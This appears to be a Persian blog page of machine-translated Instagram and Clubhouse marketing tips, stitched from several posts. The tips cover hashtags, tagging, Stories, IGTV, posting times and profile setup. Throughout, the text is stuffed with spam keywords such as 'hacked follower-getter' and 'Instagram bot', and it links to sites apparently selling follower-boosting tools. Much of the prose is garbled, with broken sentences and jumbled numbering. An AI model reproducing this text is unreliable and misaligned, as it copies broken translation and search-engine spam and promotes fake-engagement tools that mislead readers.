هرچه مشخصات شما بیشتر باشد ، افراد بیشتری علاقه مند می شوند و احتمال پیروی آنها بیشتر می شود. علاوه بر این ، استفاده از برچسب های دقیق تر باعث کاهش تعداد رقبایی می شود که برای دنبال کردن افراد مشابهی که شما هدف قرار می دهید ، شرکت می کنند. در نتیجه ، یافتن حساب های شما آسان تر و در نتیجه پیگیری آسان تر خواهد بود.

4- خسته کننده نباشید.


وقتی نوبت به ایده های زیرنویس اینستاگرام می رسد ، باید فراتر از هشتگ های واضح و یک کلمه ای نگاه کنید. مطمئناً ، شما هم می خواهید از آن استفاده کنید ، اما آن را مخلوط کنید و برای گفتن بخشی از داستان خود از هشتگ استفاده کنید. خنده دار ، کنایه آمیز ، یا ظالمانه باشید - فقط خسته کننده نباشید. شرکت فضای کاری مشترک WeWork در این زمینه عالی است و آنها همچنین ترکیبی سرگرم کننده از محتوای اینستاگرام را شامل می شوند.

11 هک برای تبدیل شدن به نمونه های هشتگ معروف WeWork در اینستاگرام
5- از هشتگ های مربوط به رویدادها استفاده کنید
هشتگ های مربوط به رویدادها شامل رویدادهایی مانند همایش های سالانه ، سمینارها و کارگاه های آموزشی در صنعت شما هستند.

آنها همچنین می توانند رویدادهای شناخته شده ای در منطقه محلی ، کشور یا جهان شما باشند که در یک زمان خاص ذهن توده ها را درگیر خود می کند. اینها اغلب برای پستهای راحت و راحت شما مناسب هستند. به عنوان مثال ، آیا شما در طول ناهار از تیم خود در حال تماشای جام جهانی عکس گرفته اید؟ ارسال کنید… و فراموش نکنید که # جام جهانی را وارد کنید! اگرچه این ممکن است طرفداران زیادی برای شما به وجود نیاورد ، زیرا اصطلاح عمومی و عامیانه ای است ، اما می تواند باعث افزایش آگاهی از تجارت شما شود ، که از تلاش شما برای به دست آوردن پیروان پشتیبانی می کند.

6. در مکالمات عامه پسند شرکت کنید.
برای هر پست ، از ترکیبی از هشتگ های موضوعی مرتبط مانند # نجاری برای یک شرکت نجاری ، به عنوان مثال ، و همچنین هشتگ های محبوب و محبوب هر جا که می توانید استفاده کنید.

11 هک برای تبدیل شدن به هشتگ معروف نجاری اینستاگرام


هشتگ های کاملاً خاص از این نظر مانند کلمات کلیدی دنباله دار هستند که هدف آنها بیشتر است و به شما کمک می کند افراد مناسب را پیدا کنید ، اما هشتگ های دارای روند جهانی برای پیشبرد تجارت شما در مقابل افراد بیشتری مفید هستند. این شامل:
# ایستاده
#tbt یا #throwbackthursday (یا هر یک از این 100+ هشتگ برای هر روز هفته)
#wbw یا #waybackwed Wednesday
#photooftheday یا #picoftheday یا #bestoftheday
#عشق
# ارسال مجدد
#بدون فیلتر
# تابستان (یا هر یک از فصول)
یا حتی # سرگرمی ساده قدیمی شما را به طور کلی در مقابل افراد بیشتری قرار می دهد.

11-ways-to-get-more-instagram-followers-national-geographic-instagram

فقط به یاد داشته باشید که هشتگ های محبوب نباید عمده استراتژی شما را تشکیل دهند. آنها مخاطبان عام تری را به خود جذب می کنند ، اما در موفقیت در بازاریابی شبکه های اجتماعی جایگاه شایسته خود را دارند ، زیرا می توانند باعث افزایش در معرض دید شما و ایجاد تعامل شوند ، و احتمالاً طرفداران جدیدی را برای شما دوست دارند. وقتی صحبت از هشتگ های خاص و عمومی می شود ، برای رشد در شبکه ای به بزرگی و پر سر و صدا بودن اینستاگرام ، به هر دو نیاز دارید.

7. از بیو URL خود نهایت استفاده را ببرید.
این املاک و مستغلات برتر در نمایه اینستاگرام شما است ... آیا واقعاً می خواهید که بیوگرافی شما فقط برای همیشه به صفحه اصلی وب سایت شما پیوند دهد؟ خمیازه. آن را حداقل دو بار در هفته تغییر دهید و از آن لینک قابل کلیک در bio خود استفاده کنید تا بازدیدها را به جدیدترین یا محبوب ترین مطالب خود هدایت کنید.

8. با زیرنویس های خود توصیف کنید.


یک عکس هزار کلمه است ، اما نمی توانید کلمات را کاملاً رد کنید. نشنال جئوگرافیک در استفاده از داستان سرایی در کنار عکس های اینستاگرام خود برای ایجاد تعامل و به اشتراک گذاری فوق العاده است. در حالی که مارک های سنتی رسانه ای مانند مگس کاهش یافته اند ، NatGeo با دیجیتال پیشرفت کرده و با بیش از 50 میلیون دنبال کننده به یکی از مارک های برتر اینستاگرام تبدیل شده است.

مانند سایر هک های اینستاگرام که من در اینجا قرار داده ام ، این چیزی است که شما می خواهید متعهد شوید که با گذشت زمان در استراتژی خود کار کنید ، بنابراین اگر در ابتدا احساس عجیب و غریب شد نگران نباشید. با یافتن صدای اینستاگرام برند خود ، نوشتار شما بهبود می یابد.

9. تمام بازاریابی تأثیرگذار را دنبال کنید.
از پروفایل های هر شخصی که به عنوان تأثیرگذار در فضای خود شناسایی کرده اید بازدید کنید (AKA شخصی که بر افرادی که می خواهید در مقابل آنها قرار بگیرند تأثیر می گذارد) و "روشن کردن اعلان های پست" را ببینید تا هر وقت محتوای جدیدی را به اشتراک می گذارند به آنها اطلاع داده شود. سپس می توانید مرتباً با آنها تعامل داشته باشید و به یکی از افراد یا مارک های مورد علاقه آنها تبدیل شوید.

ایده های بازاریابی در اینستاگرام


۱۰- عکسهای برچسب خورده ناخواسته خود را از نمایه خود حذف کنید.
اگر فقط می خواهید بهترین محتوای ایجاد شده توسط کاربر در مورد شما یا نام تجاری خود را در نمایه اینستاگرام خود قرار دهید ، می توانید. اکنون ، با انتخاب "ویرایش برچسب ها" ، انتخاب عکس هایی که می خواهید حذف کنید و "پنهان کردن از نمایه" (نمی توانید تأیید کنید) نمی توانید عکس های برچسب زده شده را به طور کامل از سایت حذف کنید. این کار را انجام می دهد.

11. قبل از نمایش محتوا در نمایه شما ، برچسب های عکس را تأیید کنید.
صحبت از کنترل بیشتر شما درباره نمایش عکسهای دارای برچسب در نمایه شما ، می توانید تنظیمات اینستاگرام خود را تغییر دهید تا عکسهای دارای برچسب نشان داده نشوند مگر اینکه ابتدا آنها را تأیید کنید. این مورد را در بخش "گزینه ها" ، "عکس های شما" و "افزودن دستی" پیدا خواهید کرد.

11 هک برای معروف شدن اینستاگرام به صورت دستی عکس اضافه کنید
سعی می کنم به دلیلی فکر کنم که چرا هیچ شرکتی تمایل به انجام این کار ندارد ... نه. من چیزی ندارم شما باید کاملاً این موارد را تنظیم کنید تا از موقعیت های بالقوه شرم آور جلوگیری کنید.

12. سبک اینستاگرام خود را توسعه دهید.


این طبیعت انسانی است که می خواهد در آن جا بیفتد ، اما در اینستاگرام ، شما می خواهید برجسته باشید. نام تجاری نوشیدنی هندی Frooti چنین سبک محتوایی بصری منحصر به فردی را توسعه داده است ، هر زمان که کاربر در خبر خود پست Frooti را مشاهده می کند ، بلافاصله قابل تشخیص است. آن را بررسی کنید:

khodam بازدید : 49 1400/04/10 زمان : 18:36 نظرات (0)

جذب فالوور در اینستاگرام با  سرعت بالا

18. کاربران مربوطه را برچسب گذاری کنید


شما می توانید کاربران Instagram را که در عکسهای شما وجود دارد با ذکر @ در عنوان خود یا با استفاده از قابلیت برچسب گذاری Instagram در پست ، برچسب گذاری کنید. در هر صورت ، هنگام انجام این کار ، آنها اعلانی دریافت می کنند. فالووربگیر هک شده

پست Hootsuite در اینستاگرام که یک شریک را در عنوان نشان می کند (به عنوان نمونه ای از نحوه جذب بیشتر دنبال کنندگان اینستاگرام)

برچسب زدن به شخصی او را ترغیب می کند تا با پست درگیر شود و آن را با افراد زیر به اشتراک بگذارد پست شما همچنین در برگه Tagged in در نمایه اینستاگرام آنها ظاهر می شود.

همچنین می توانید کاربران مربوطه را در Instagram Stories خود برچسب گذاری کنید. سپس ، آنها فقط با چند بار ضربه زدن می توانند محتوا را در Story خود دوباره به اشتراک بگذارند. در صورت انجام این کار ، همه افرادی که Story خود را مشاهده می کنند نام کاربری شما را می بینند و می توانند برای ورود به حساب شما کلیک کنند.

Hootsuite Story Instagram که یک کاربر را برچسب گذاری می کند (به عنوان نمونه ای از نحوه جذب بیشتر دنبال کنندگان اینستاگرام)

متوجه خواهید شد که ما گفته ایم فقط باید کاربران مربوطه را برچسب گذاری کنید. علامت گذاری برچسب فقط برای جلب توجه او ایده خوبی نیست. فقط کسانی را که در عکس شما نشان داده شده اند یا مربوط به محتوای پست شما هستند ، نشان کنید.

Hootsuite Planner showing scheduled Instagram Stories

برخی از کاربران بالقوه مرتبط برای برچسب زدن ممکن است شامل موارد زیر باشد: فالووربگیر هک شده

مشتری ها
تأمین کنندگان
سایر مشاغل مرتبط
همکاران یا کارمندان
شخصی که به شما مهارتی آموخته یا در مورد چیزی که در این پست به اشتراک می گذارید به شما گفته است
هرکسی که در عکس ظاهر شود
19. دیگران را تشویق کنید تا شما را نشان کنند
روش دیگر برای معرفی حساب اینستاگرام خود به مخاطبان جدید این است که از سایر کاربران اینستاگرام بخواهید شما را برچسب گذاری کنند. وقتی آنها شما را در پستی نشان می کنند ، مخاطبان دسته شما را می بینند و اگر می خواهند بیشتر بدانند می توانند روی آن کلیک کنند.

بیو شما مکانی عالی برای درخواست مردم برای نشان دادن شما در اینستاگرام است.

به عنوان مثال ، بازدید از ایالات متحده آمریکا از Instagrammers می خواهد تا آنها را برچسب گذاری کند تا فرصتی برای نشان دادن در حساب آنها ایجاد شود.

پیروان اینستاگرام از برچسب ویژگی USA بازدید می کنند

منبع:visittheusa در اینستاگرام

20. حساب های مربوطه را دنبال کنید
فقط زمانی باید افراد را در یک پست اینستاگرام برچسب گذاری کنید که محتوا مستقیماً با آنها مرتبط باشد. اما می توانید هرکسی را که دوست دارید دنبال کنید. و هنگامی که شما یک کاربر را در اینستاگرام دنبال می کنید ، احتمال زیادی وجود دارد که او خبرمایه شما را بررسی کند.

اگر خبرمایه اینستاگرام شما پر از محتوای جذاب مرتبط با علایق آنها باشد ، احتمالاً مورد پسند شما قرار می گیرد.

گوش دادن به شبکه اجتماعی راهی عالی برای یافتن مکالمات مرتبط با نام تجاری شما است. و از آنجا به راحتی می توانید کاربران تأثیرگذار (نفوذگرهای معروف) را برای دنبال کردن شناسایی کنید. ایده خوبی است که از دنبال کنندگان آن کاربران برتر نیز پیروی کنید.

بخش "پیشنهادی برای شما" در اینستاگرام همچنین منبع بسیار خوبی برای یافتن حساب های مرتبط برای دنبال کردن است. این در خبرمایه شما بین پست ها یا در سمت راست صفحه در رایانه ظاهر می شود. فالووربگیر هک شده

با رفتن به نمایه خود ، سپس با کلیک بر روی سه نوار در بالا سمت راست و کلیک روی Discover People ، می توانید به پیشنهادهای اینستاگرام دسترسی داشته باشید. در اینجا همچنین می توانید لیستی از حساب های محبوب Instagram را که براساس الگوریتم انتخاب شده اند ، پیدا کنید.

اما به یاد داشته باشید که نباید خیلی سریع حسابهای دیگر را دنبال کنید. نسبت پیروی شما برای اعتبار مهم است. نسبت پیرو شما تعداد افرادی است که شما را دنبال می کنند در مقایسه با تعداد افرادی که شما را دنبال می کنید.

و بازی را در جایی انجام ندهید که افراد را برای جلب توجه آنها دنبال کنید ، سپس بعد از اینکه دوباره شما را دنبال کردند ، دنبال کنید. این برای اعتبار اینستاگرام شما خوب نیست ، زیرا واقعاً یک حرکت تند است.

21. با جوامع موجود درگیر شوید


مانند همه شبکه های رسانه های اجتماعی ، اینستاگرام نیز درباره جوامعی است که در آن ساخته شده است. شما می خواهید با آن انجمن ها درگیر شوید.

با پسندیدن ، نظر دادن و به اشتراک گذاری مطالب از کاربران معتبر دیگر در انجمن خود ، درگیر شوید. از نظرات عمومی (مانند "پست عالی!") که به نظر می رسد از ربات ها آمده است ، خودداری کنید. فالووربگیر هک شده

این کمک می کند تا توجه (و پیروان بالقوه جدید) از دو طریق جلب شود:

وقتی افراد پست های شما را دوست دارند و درباره آنها نظر می دهند ، اعلان دریافت می کنند و ممکن است برای جلب لطف ، نمایه شما را بررسی کنند.
افراد دیگر نظرات شما را می بینند و اگر آنها را متفکرانه یا جذاب بدانند ، ممکن است نمایه شما را بررسی کنند.
22. با نفوذگران در جای خود کار کنید
در اینجا یک آمار مهم برای هر کسی که در مورد چگونگی جذب فالوور بیشتر در اینستاگرام فکر می کند وجود دارد: 60٪ از مصرف کنندگان می گویند که پس از مشاهده تبلیغ نام تجاری توسط اینفلوئنسر مورد اعتماد ، مارکی را در اینستاگرام دنبال می کنند.

ما یک راهنمای کامل در مورد بازاریابی Influencer برای کمک به شما داریم.

23. با مارک های دیگر همکاری کنید
از مراجعه به مارک های دیگر نترسید و ببینید راهی وجود دارد که می توانید در اینستاگرام با هم کار کنید. نوع همکاری مناسب می تواند به همه افراد درگیر کمک کند تا دنبال کنندگان بیشتری در اینستاگرام پیدا کنند.

به مارک ها یا مشاغل دیگری که قبلاً با روش های دیگری با یکدیگر همکاری کرده اید ، فکر کنید ، مانند یک انجمن بهبود مشاغل محلی یا منطقه خرید. چگونه می توانید در اینستاگرام با هم کار کنید؟

یکی از گزینه های رایج ، میزبانی یک مسابقه با محصولات چندین شرکت است ، مانند شرکت صابون راکی ​​کوه با آنیکا مانگ ازborntobeadventurous.

24. داستان های اینستاگرام را در آغوش بگیرید فالووربگیر هک شده


ما قبلاً در چندین نکته به Stories اشاره کرده ایم ، اما ارزش آن را دارد که به طور خاص از این ویژگی استفاده کنید. به زبان ساده ، اگر دنبال کنندگان اینستاگرام بیشتری می خواهید ، باید از Instagram Stories استفاده کنید. روزانه نیمی از حساب های اینستاگرام از Stories استفاده می کنند و 45٪ بیشترین بازدید از استوری ها مربوط به مشاغل است

افرادی که از Stories استفاده می کنند بسیار سرگرم هستند. طبق اینستاگرام ، از هر سه داستان یک پیام منجر به پیام مستقیم می شود.

از هشتگ و ویژگی های موقعیت مکانی در داستان های خود استفاده کنید تا آنها را در معرض افرادی قرار دهید که از قبل شما را دنبال نمی کنند. این هنوز هم راهی کم استفاده برای جذب فالوور در اینستاگرام به صورت رایگان است.

برای چند نکته بیشتر درباره Instagram Story Story ویدیوی زیر را تماشا کنید.

25. از ویژگی های تعاملی استفاده کنید
Instagram Stories از ویژگی های تعاملی فراوانی برای درگیر کردن کاربران مانند برچسب های نظرسنجی ، س questionال و گپ استفاده می کند.

برچسب های نظرسنجی بازدیدهای ویدیویی سه ثانیه ای را در 90٪ از کمپین های بتا اینستاگرام برای این ویژگی افزایش داده است.

با استفاده از ویژگی های تعاملی مانند نظرسنجی ها ، تعداد بیشتری فالوور اینستاگرام بگیرید

منبع: اینستاگرام

اگر کاربران از یک هشتگ یا یک صفحه مکان با Story شما روبرو می شوند ، این فرصت فوری برای برقراری ارتباط راهی عالی برای ایجاد تمایل به کسب اطلاعات بیشتر در مورد مارک تجاری شما است.

26. از موارد برجسته Stories بیشترین استفاده را ببرید

فالووربگیر هک شده
موارد برجسته Stories به شما فرصتی می دهد تا برند خود را به افرادی که از نمایه شما بازدید می کنند معرفی کنید. این موارد برجسته را با انبوه اطلاعات و محتوای عالی بسته بندی کنید تا به بازدیدکنندگان جدید نشان دهید دقیقاً چرا باید روی دنبال کردن کلیک کنند.

از عکسهای جلد در موارد برجسته خود نیز بسیار استفاده کنید. هواپیمایی Porter با نمادهای سفارشی که طلسم ناز آنهاست ، کار بزرگی انجام می دهد.

موارد برجسته داستان اینستاگرام خطوط هوایی Porter نشان می دهد که چگونه می توان با داشتن یک پروفایل زیبا و تمیز پیروان بیشتری را در اینستاگرام به دست آورد

منبع:porterairlines در اینستاگرام

27. همکاری Instagram Live را امتحان کنید

اینستاگرام بهترین مکان برای استفاده از ویدئوهای زنده است ، روندی که همچنان در حال رشد در شبکه های اجتماعی است. از طریق ویژگی های تعاملی مانند س questionsالات و نظرات ، می توانید در زمان واقعی با بینندگان ارتباط برقرار کنید ، و جذابیت ارزشمند بیشتری را ایجاد کنید که می تواند به شما در افزایش دسترسی کمک کند.

فیلم های زنده در Story مارک شما ظاهر می شوند. وقتی ویدیوی زنده به پایان رسید ، می توانید آن را از بین ببرید ، انتخاب کنید که آن را برای پخش در Story خود به مدت 24 ساعت در دسترس قرار دهید یا آن را به IGTV اضافه کنید. وقتی حسابی که دنبال می کنند به طور مستقیم پخش می شود ، به کاربران اطلاع داده می شود ، بنابراین یک ویدیوی زنده واقعاً جلب توجه می کند.

برای اینکه ویدیوی زنده خود را در معرض دید مخاطبان کاملا جدید قرار دهید ، از گزینه "Go live with a friend" برای میزبانی مشترک یک ویدیوی زنده با شخص دیگری در صنعت خود استفاده کنید. از شخص دیگر بخواهید یک ویدیوی زنده را میزبانی کند و سپس شما را به عنوان مهمان دعوت کند. شما دو نفر در یک صفحه تقسیم شده ظاهر می شوید و شما را با همه پیروان آنها آشنا می کنید.

در عصر COVID-19 ، Instagrammers از این ویژگی به صورت خلاقانه برای میزبانی نمایش های کوچک صحبت کرده اند. به عنوان مثال ، Design اضطراری میزبان هفتگی Live Instagram است که در آن از Go live با یکی از دوستان خود برای مصاحبه با چهره های اصلی دنیای طراحی استفاده می کنند و Wine Spectator نیز یک سریال با حضور شراب سازان را میزبانی می کند.

28. یک سریال IGTV را امتحان کنید

فالووربگیر هک شده
در حالی که هر دو سری ذکر شده در نکته قبلی در Instagram Live ارائه شده اند ، اما پس از پایان مکالمه زنده نیز برای IGTV ارسال می شوند.

فیلم های IGTV می توانند حداکثر یک ساعت طول بکشند ، به شما امکان می دهد موضوعات را به صورت عمیق کاوش کنید. همچنین می توانید یک سری IGTV ایجاد کنید ، که بینندگان را ترغیب می کند تا حساب شما را دنبال کنند نه اینکه فقط یک فیلم را تماشا کنند و ادامه دهند.

پستهای IGTV چهار برابر بزرگتر از عکسهای موجود در برگه Explore به نظر می رسند و باعث می شود پیروان بالقوه جدید روی محتوای شما کلیک کنند.

Hootsuite یک مجموعه IGTV به نام Fridge-Worthy: یک نمایش جوایز بسیار جدی و معتبر برای رسانه های اجتماعی ایجاد کرد که به مارک ها برای انجام کارهای منحصر به فرد در شبکه های اجتماعی جوایز می دهد.


29. یک فیلتر AR ایجاد کنید
فیلترهای AR برای Instagram Stories جلوه های تصویری هستند که Instagrammers می تواند برای تغییر عکس های گرفته شده از طریق دوربین جلو و عقب تلفن همراه خود استفاده کند. آن پست هایی که گوش توله سگ دارند؟ این کارها با فیلتر AR (واقعیت افزوده) انجام می شود. کسانی که "شما [سبزیجات / پیتزا / شکلک / و غیره] هستید؟" نوشته ها؟ کسانی که از فیلترهای AR نیز استفاده می کنند.

اکنون هر کاربر اینستاگرام می تواند فیلتر AR ایجاد کند. فیلترهایی که ایجاد می کنید در بخشی از نمایه اینستاگرام شما که با یک نماد چهره مشخص شده است ، زندگی می کنند. اگر فیلتر شما تبلیغاتی یا مارک دار نباشد ، در گالری جلوه های Instagram Stories نیز نمایش داده می شود ، جایی که هر Instagrammarger می تواند آن را پیدا کند.

چگونه ایجاد فیلتر AR به شما کمک می کند تعداد بیشتری فالوور اینستاگرام داشته باشید؟ هر زمان که کسی از فیلتر AR شما استفاده می کند ، نام حساب شما در گوشه بالا سمت چپ نشان داده می شود. قابل کلیک است و می تواند بازدیدکنندگان جدیدتری را به نمایه شما وارد کند.

فیلترهای AR داستان های اینستاگرام (نمونه نحوه جذب فالوور بیشتر در اینستاگرام)

منبع:gucci در اینستاگرام فالووربگیر هک شده

30. به طور مداوم ارسال کنید
پیروان موجود شما می خواهند محتوای شما را ببینند. به همین دلیل آنها در وهله اول شما را دنبال کردند.

همانطور که قبلاً نیز اشاره کردیم ، وقتی کاربران با پستهای شما ارتباط برقرار می کنند ، افزایش تعامل به شما الگوریتم خوبی می بخشد. بنابراین دادن فالوورهای فعلی خود برای تعامل با فالورهای موجود می تواند به ایجاد فالوورهای جدید اینستاگرام نیز کمک کند.

چند وقت یکبار باید ارسال کنید؟ تجزیه و تحلیل توسط Tailwind نشان داد که ارسال روزانه "چهار برابر سریعتر از ارسال پست در هفته کمتر خواهد شد."

31. ارسال در زمان مناسب
بله ، اینستاگرام به جای منبع تغذیه زمانی از الگوریتم استفاده می کند. با این حال ، زمان بندی هنوز مهم است ، زیرا یکی از سیگنالهایی است که الگوریتم در نظر می گیرد.

تیم اجتماعی Hootsuite دریافت که بهترین زمان برای ارسال در اینستاگرام بین 8 صبح تا 12 عصر PST یا در غیر این صورت 4-5 بعد از ظهر PST در روزهای هفته است. اما مخاطبان شما ممکن است عادت های متفاوتی نسبت به عادت های ما داشته باشند. بهترین استفاده از ابزاری مانند Hootsuite Analytics ، که می تواند بهترین زمان ارسال پست برای مخاطبان خود را بر اساس مشارکت قبلی ، برداشت ها یا بازدیدکننده داشته باشد.

داشبورد تجزیه و تحلیل Hootsuite که فالوورهای اینستاگرام را بصورت آنلاین و ساعت نشان می دهد فالووربگیر هک شده
منبع: Hootsuite Analytics
آزمایش زمان های مختلف و اندازه گیری نتایج را شروع کنید. به عنوان مثال اگر یک مارک تجاری خرده فروشی هستید ، ممکن است بخواهید پست ارسال را در زمان ناهار امتحان کنید.

32. برنامه ها و پست های خود را برنامه ریزی کنید
آیا بهترین زمان برای ارسال پست زمان مناسبی برای حضور در اینستاگرام نیست؟ برای برنامه ریزی و انتشار مستقیم در اینستاگرام از یک ابزار مدیریت شبکه های اجتماعی مانند Hootsuite استفاده کنید.

برنامه ریزی قبلی برای ارسال پست ها به شما امکان می دهد یک شبکه منسجم در اینستاگرام که یک داستان کلی را روایت می کند ، برنامه ریزی کنید. همچنین به شما این امکان را می دهد تا به جای تلاش برای تهیه چیزهای بذله گو ، زمان خود را به ایجاد زیرنویس های عالی اختصاص دهید.

اکنون می توانید از Hootsuite برای برنامه ریزی Stories اینستاگرام نیز استفاده کنید.

https://choobingroup.ir/product/%d9%81%d8%a7%d9%84%d9%88%d9%88%d8%b1%d8%a8%da%af%db%8c%d8%b1-%d9%87%da%a9-%d8%b4%d8%af%d9%87/

khodam بازدید : 62 1400/04/05 زمان : 19:29 نظرات (0)

10 بهترین نکات و کلاهبرداری در مورد برنامه کلاب ها: همه شما برای حرفه ای بودن باید بدانید

1. بدون دعوت به Clubhouse بپیوندید
این باید بزرگترین هک همه آنها باشد. اگر کسی را می شناسید که از قبل در Clubhouse است ، بدون دعوت می توانید به برنامه Clubhouse اختصاصی iOS فقط دعوت شوید. اگر با شخصی که قبلاً از این برنامه استفاده کرده اید دوست هستید و در لیست مخاطبین یکدیگر هستید ، می تواند بدون دعوت شما را به Clubhouse راه دهد. فالوور کلاب هاوس

اگر قبلاً در کلاب هاوس هستید و دعوت نامه های شما تمام شده است ، می توانید از دوستان خود بخواهید که وارد سیستم شوند و اجازه ورود به آنها را بدهند. وقتی یکی از دوستانتان بدون دعوت به سیستم وارد شد ، به شما اطلاع داده می شود و از شما سال می شود که آیا می خواهید به آنها اجازه دهید در. شما می توانید از طریق نماد زنگ در صفحه اصلی برنامه به این اعلان دسترسی پیدا کرده و از آنها در برنامه استقبال کنید.

ما مطمئن نیستیم که این ویژگی برای کاربرانی که مخاطبین تلفنی خود را با Clubhouse همگام سازی نکرده اند ، کارایی خواهد داشت.

نکته حرفه ای: حتی اگر کسی را در برنامه نمی شناسید ، فقط برای آن ثبت نام کنید و نام کاربری را رزرو کنید. از آنجا که Clubhouse هنوز در حال رشد است ، شانس بیشتری برای شما وجود دارد که نام کاربری دلخواه خود را بدست آورید.

2. حساب های بیوگرافی و رسانه های اجتماعی اضافه کنید


برنامه Clubhouse یک رسانه اجتماعی فقط با صدا است اما شما می توانید کارهای بیشتری را از طریق این برنامه انجام دهید. می توانید یک بیوگرافی اضافه کنید و حساب های Twitter و Instagram خود را پیوند دهید تا دوستان Clubhouse شما نیز بتوانند شما را در سیستم عامل های دیگر پیدا کنند.

برای افزودن بیوگرافی و پیوند دادن حساب های رسانه های اجتماعی خود به کلابهاوس ، برنامه کلابهاوس را باز کنید> روی نمایه خود ضربه بزنید> افزودن بیو درست در زیر دکمه bio ، دکمه های پیوند دادن حساب های Twitter و Instagram خود را پیدا خواهید کرد.

3. یک عکس پروفایل Clubhouse تنظیم کنید


سازندگان کلابهاوس بر نام ها و تصاویر واقعی تأکید کرده اند. در حالی که من خودم چندین پروفایل با برد پیت به عنوان تصویر دیده ام ، اما شما را تشویق می کنم که با یک تصویر واقعی همراه شوید. وقتی تصمیم به میزبانی یک اتاق یا گفتگو در یک باشگاه کلبه ها می گیرید ، بهتر به نظر می رسد و اعتبار بیشتری می بخشد.

برای تنظیم یک عکس نمایه در Clubhouse ، برنامه را باز کنید و روی نماد نمایه در سمت راست بالا> روی نماد تصویر نمایه> روی تصویر ضربه بزنید. اکنون می توانید عکس جدیدی بگیرید یا از کتابخانه تلفن خود یکی را انتخاب کنید.

نکته حرفه ای: هنگامی که حساب اینستاگرام یا توییتر خود را پیوند می دهید ، این برنامه به شما امکان می دهد از آنجا عکس پروفایل وارد کنید. همیشه داشتن تصاویر پروفایل مشابه در سراسر سیستم عامل همیشه خوب است.

4- علائق باشگاه خود را اصلاح کنید


هنگام ثبت نام در برنامه Clubhouse ، می توانید برخی از موضوعات مورد علاقه برنامه را برای ارائه توصیه های مربوطه انتخاب کنید. یکی از بهترین نکات و ترفندهای برنامه Clubhouse تغییر علایق Clubhouse است. می توانید مباحث بیشتری را انتخاب کنید یا توصیه های خود را هر طور که می خواهید محدود کنید.

برای تغییر علایق Clubhouse خود ، برنامه را باز کنید و روی دکمه نمایه خود ضربه بزنید. اکنون روی نماد چرخ دنده ضربه بزنید تا به تنظیمات بروید> علایق را لمس کنید. می توانید علایق خود را از اینجا به روز کنید.

5- به یک باشگاه بپیوندید


نحوه راه اندازی یک باشگاه کلاب
این همان چیزی است که Clubhouse برای آن منظور شده است. در برنامه Clubhouse چندین باشگاه وجود دارد که می توانید آنها را در بخش جستجو پیدا کنید. اگر یک شرکت کننده فعال باشید ، می توانید باشگاه های جدیدی را دنبال کنید ، باشگاه خود را تأسیس کنید یا به عضویت باشگاه های مختلف درآید.

https://followebin.ir

khodam بازدید : 53 1400/04/03 زمان : 15:28 نظرات (0)

33 هک اینستاگرام آرزو می کنید زودتر بدانید

آماده اضافه کردن برخی از هک های قاتل اینستاگرام به زرادخانه اجتماعی خود هستید؟ ساخت ربات اینستاگرام با سی شارپ

وقفه های خط را به زیرنویس های خود اضافه کنید ، هشتگ ها را در استوری های خود پنهان کنید و فقط با دو ضربه به DM پاسخ دهید - هک های اینستاگرام ما به شما کمک می کنند تا سریعتر و دقیق تر کار کنید!

ما در حال کشف 33 مورد از بهترین هک های اینستاگرام هستیم تا به شما کمک کنیم از بازاریابی اینستاگرام خود بیشتر بهره ببرید:

ربات ایستاگرام
Instagram Hacks برای ایجاد نمایه های جالب Instagram:
به نمایه و بیوگرافی اینستاگرام خود به عنوان زمین آسانسور خود فکر کنید - می خواهید در عرض چند ثانیه به دنبال کنندگان جدید اجازه دهید دقیقاً بدانند شما چه کسانی هستید و چه کاری انجام می دهید.

بنابراین یک مشخصات خوب و واضح برای ایجاد یک تأثیر ماندگار کلیدی است!

در اینجا هک های برتر ما برای ایجاد پروفایل ها و بیوگرافی جالب اینستاگرام است که به شما کمک می کند تا در میان مردم متمایز شوید:

Instagram Hacks # 1: شکستن خط را به بیوگرافی خود اضافه کنید
آیا سعی کرده اید یک بیوگرافی بی نقص و مناسب برای اینستاگرام بنویسید اما به دلیل اینکه Instagram این خط شکسته های شما را برطرف می کند ناامید می شوید؟

این یک راه حل سریع است که می تواند تغییر بزرگی در بیوگرافی شما ایجاد کند - و بازدیدکنندگان را با اولین برداشت عالی ترک می کند!

و تمام آنچه که لازم است ورود به اینستاگرام از طریق لپ تاپ شماست!

نحوه افزودن خط شکسته ها به بیوگرافی اینستاگرام خود:

با لپ تاپ خود به Instagram.com بروید و وارد حساب خود شوید
از صفحه نمایه خود ، روی "ویرایش نمایه" ضربه بزنید
با این کار برگه تنظیمات باز می شود که می توانید بیو خود را مستقیماً در جعبه متن بنویسید!
پس از اتمام ویرایش بیو ، روی "ارسال" کلیک کنید تا نمایه شما به روز شود - همه وقفه های خط شامل آن می شود!
Instagram Hacks: Bio را ویرایش کنید
Instagram Hacks # 2: پیوند به سایر پروفایل ها یا هشتگ ها در Bio شما
آیا می دانید اکنون می توانید متن قابل کلیک را در بیوگرافی خود اضافه کنید؟

بنابراین اکنون وقتی # یا @ را قبل از کلمه یا حساب وارد می کنید ، سایر کاربران می توانند برای کسب اطلاعات بیشتر روی آن کلیک کنند!

اگر بیش از یک حساب برای نام تجاری خود مدیریت می کنید یا یک کمپین هشتگ مارک دار را دنبال می کنید ، این می تواند واقعاً مفید باشد.

به عنوان مثال ، فروشگاه آنلاین لباس ،ASOS ، این کار را به خوبی انجام می دهد زیرا آنها از بیوگرافی خود به پروفایل های اینستاگرام خود که به سلامت و زیبایی و کفش های ورزشی اختصاص دارد پیوند می دهند. آنها همچنین به هشتگ #AsSeenOnMe خود پیوند دارند که بیش از 1.1 میلیون پست دارای برچسب دارد!

نحوه پیوند دادن به نمایه ها یا هشتگ های دیگر در بیوگرافی شما: ربات ایستاگرام

از صفحه نمایه اینستاگرام خود ، روی "ویرایش نمایه" ضربه بزنید
در بخش bio ، هر دسته اینستاگرام (از جمله نماد @) یا هشتگ (با استفاده از نماد #) اضافه کنید
بعد از اتمام بیوگرافی ، روی «تمام شد» در سمت راست بالای صفحه ضربه بزنید
اینستاگرام این متن را به صورت خودکار به پروفایل ها یا هشتگ های اینستاگرام پیوند می دهد
آماده برای شروع به کار کردن و به اشتراک گذاری UGC در اینستاگرام هستید؟ بعداً بپیوندید تا محتوای تولید شده توسط کاربر را به راحتی در فیدهای اجتماعی خود بیابید ، برنامه ریزی کرده و ارسال کنید!

محتوای تولید شده توسط کاربر را پیدا کنید (و آنها را به اشتراک بگذارید) - از بعداً!

محتوای تولید شده توسط کاربر را از هشتگ ها ، برچسب ها و موارد ذکر شده پیدا کنید ، و فقط با چند کلیک آن را به کتابخانه رسانه خود اضافه کنید!

بیشتر بدانید!

 ربات ایستاگرام

